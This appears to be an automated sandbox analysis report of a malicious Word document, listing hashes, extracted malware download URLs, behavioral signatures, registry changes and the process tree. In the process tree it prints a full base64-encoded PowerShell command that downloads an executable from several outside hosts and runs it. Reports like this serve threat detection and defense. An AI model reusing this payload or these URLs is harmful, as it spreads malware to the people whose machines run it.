Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 21:13
Behavioral task
behavioral1
Sample
ee6ee4d3076e89ac50e38261058012b2_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ee6ee4d3076e89ac50e38261058012b2_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ee6ee4d3076e89ac50e38261058012b2_JaffaCakes118.doc
-
Size
185KB
-
MD5
ee6ee4d3076e89ac50e38261058012b2
-
SHA1
a13416c9f0430b47ddff2d4eb66a324afb8d37c5
-
SHA256
3d0173175bbc0f83d9a5a2b8324c817f6a433756949f63691ec5374d82859a6f
-
SHA512
d7559ef5442697bcd2865a38ecad53a4801b0e310cf74e5e99c5ab9489b8a165489f26e3dcdb9f4e36cf688b2ab49ab6257c9f5a8c5bf8632d0a1ce26bbab257
-
SSDEEP
3072:S4PrXcuQuvpzm4bkiaMQgAlSKOgiWMYKg6wohjP:TDRv1m4bnQgISKOxWM66wohjP
Malware Config
Extracted
https://marinamet.work/wp-admin/ksx2892006/
http://www.slservicebd.com/wp-content/ezP/
http://ajedrezenmorelos.com/imagenes/bcPAkRelh/
http://mckinzielaw.com/mail/HQfOiQnjpTTIp/
https://konican.com/cgi-bin/gpZCxzCpR/
https://medfront.mx/gkxbo/FXUaGblNTfMNS/
https://aerofoam.radishdevelopment.nl/alfacgiapi/cFGILh/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 2872 powersheLL.exe 30 -
Blocklisted process makes network request 6 IoCs
flow pid Process 6 3008 powersheLL.exe 7 3008 powersheLL.exe 9 3008 powersheLL.exe 11 3008 powersheLL.exe 15 3008 powersheLL.exe 16 3008 powersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BCFA1D15-C2A6-4969-84DF-FB79D229A89B}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{BCFA1D15-C2A6-4969-84DF-FB79D229A89B}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{BCFA1D15-C2A6-4969-84DF-FB79D229A89B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BCFA1D15-C2A6-4969-84DF-FB79D229A89B}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BCFA1D15-C2A6-4969-84DF-FB79D229A89B}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2568 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3008 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3008 powersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2568 WINWORD.EXE 2568 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2568 wrote to memory of 1620 2568 WINWORD.EXE 35 PID 2568 wrote to memory of 1620 2568 WINWORD.EXE 35 PID 2568 wrote to memory of 1620 2568 WINWORD.EXE 35 PID 2568 wrote to memory of 1620 2568 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee6ee4d3076e89ac50e38261058012b2_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABBADQAawA1AHYAdQBqAD0AKAAnAEwAbwAyACcAKwAnADUAMwBlACcAKwAnAGkAJwApADsAJgAoACcAbgBlAHcALQAnACsAJwBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAFYAOgBUAGUATQBwAFwAbwBGAGYASQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAdQByAEkAdABgAHkAcAByAE8AYABUAG8AYwBPAGwAIgAgAD0AIAAoACcAdABsAHMAJwArACcAMQAyACcAKwAnACwAJwArACcAIAB0AGwAcwAnACsAJwAxADEALAAgACcAKwAnAHQAbABzACcAKQA7ACQAVwA3AGIAYgB3ADEAeAAgAD0AIAAoACcARABxAHIAMwB0ACcAKwAnAHkAJwArACcAbgBhACcAKQA7ACQAWQBuADcAZQBkAGIAZAA9ACgAJwBNAGkAdABhAF8AawAnACsAJwBqACcAKQA7ACQAVgB6ADQANABwAGYAawA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcASgB4ACcAKwAnAFUATwBmAGYAaQBjACcAKwAnAGUAMgAwADEAOQBKAHgAJwArACcAVQAnACkALQByAGUAUABMAEEAYwBFACAAJwBKAHgAVQAnACwAWwBDAGgAYQBSAF0AOQAyACkAKwAkAFcANwBiAGIAdwAxAHgAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAEcAbQBhAG8AcQAxADIAPQAoACcASAA3ACcAKwAnAGYAaQA3AHgAbQAnACkAOwAkAEEAOQBsAGsAcgBtAHEAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAEQAcgBxAGkAMwBnAGUAPQAoACcAaAB0AHQAcABzADoALwAvAG0AJwArACcAYQAnACsAJwByAGkAJwArACcAbgBhACcAKwAnAG0AZQB0AC4AdwBvAHIAawAnACsAJwAvAHcAJwArACcAcAAtAGEAZAAnACsAJwBtAGkAJwArACcAbgAvAGsAcwB4ADIAOAAnACsAJwA5ADIAMAAwACcAKwAnADYALwAqAGgAdAB0AHAAOgAnACsAJwAvAC8AdwB3AHcALgBzAGwAJwArACcAcwBlAHIAdgBpACcAKwAnAGMAZQBiACcAKwAnAGQALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtAGMAbwBuAHQAZQBuACcAKwAnAHQALwBlAHoAUAAvACoAaAAnACsAJwB0ACcAKwAnAHQAcAA6AC8ALwBhAGoAZQBkACcAKwAnAHIAJwArACcAZQB6AGUAJwArACcAbgBtAG8AcgBlAGwAbwBzACcAKwAnAC4AYwBvAG0ALwBpAG0AYQBnAGUAJwArACcAbgAnACsAJwBlAHMAJwArACcALwAnACsAJwBiAGMAUABBAGsAUgBlAGwAaAAvACoAaAB0AHQAcAA6AC8AJwArACcALwAnACsAJwBtACcAKwAnAGMAawBpAG4AegBpAGUAbABhAHcALgBjACcAKwAnAG8AJwArACcAbQAvAG0AYQBpAGwAJwArACcALwAnACsAJwBIAFEAZgBPAGkAUQBuACcAKwAnAGoAJwArACcAcABUAFQASQAnACsAJwBwAC8AJwArACcAKgBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAvACcAKwAnAC8AJwArACcAawBvAG4AaQBjAGEAbgAuAGMAJwArACcAbwAnACsAJwBtAC8AYwAnACsAJwBnAGkAJwArACcALQAnACsAJwBiACcAKwAnAGkAbgAvAGcAJwArACcAcABaAEMAeAAnACsAJwB6AEMAcAAnACsAJwBSAC8AKgBoACcAKwAnAHQAdAAnACsAJwBwAHMAOgAvAC8AbQBlAGQAZgByAG8AJwArACcAbgB0AC4AbQB4AC8AZwBrACcAKwAnAHgAYgBvAC8ARgAnACsAJwBYACcAKwAnAFUAYQBHAGIAbAAnACsAJwBOAFQAZgBNAE4AUwAvACoAJwArACcAaAB0AHQAcABzACcAKwAnADoALwAnACsAJwAvAGEAZQByACcAKwAnAG8AZgBvAGEAbQAuAHIAYQBkACcAKwAnAGkAcwBoAGQAJwArACcAZQB2AGUAJwArACcAbABvAHAAbQBlACcAKwAnAG4AdAAuAG4AbAAnACsAJwAvACcAKwAnAGEAbABmAGEAYwBnAGkAYQBwAGkALwAnACsAJwBjACcAKwAnAEYAJwArACcARwBJAEwAJwArACcAaAAvACcAKQAuACIAUwBgAHAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAHcAeABoAG4AcABuAD0AKAAnAFIAdgAnACsAJwBrADgAegAyACcAKwAnAGYAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQA3AHkAaQBtAGsANAAgAGkAbgAgACQARAByAHEAaQAzAGcAZQApAHsAdAByAHkAewAkAEEAOQBsAGsAcgBtAHEALgAiAEQATwBgAHcAYABOAGwAbwBBAGAAZABmAEkATABFACIAKAAkAFUANwB5AGkAbQBrADQALAAgACQAVgB6ADQANABwAGYAawApADsAJABGAG0AawBsAG0AdwAzAD0AKAAnAFAAJwArACcAaQA1AGgAJwArACcAOAA2AG4AJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFYAegA0ADQAcABmAGsAKQAuACIATABFAG4AYABnAHQAaAAiACAALQBnAGUAIAAzADcAMwA4ADkAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwAnACsAJwBrAGUALQBJAHQAZQBtACcAKQAoACQAVgB6ADQANABwAGYAawApADsAJABDADIAbgB4AGIAYwA1AD0AKAAnAFIAMgA2ACcAKwAnAHEAJwArACcANgAwAHUAJwApADsAYgByAGUAYQBrADsAJABaAGEAdABtAGIAZAB5AD0AKAAnAEwAdwAnACsAJwBmAHYAZgBxADUAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLAGEAdgBfADQAdABnAD0AKAAnAEwAbQAnACsAJwB5ADYAOAAzADMAJwApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5b589539c65b8193999c77cd1271b5c0d
SHA1a207b01f4ec8fe183954e0af31022957c51eb554
SHA2567be87941d4dedfca97ac9038c15dfb35ef7400f84a3169b11f4ad9f3d7974f19
SHA512135000bf1c3a0013717116b4d0d9c78fcace9469000e0b81128fa60838de60615e177c188546035694007a48c4ba187b48d86e72cceab490eb77ea0fbe08b497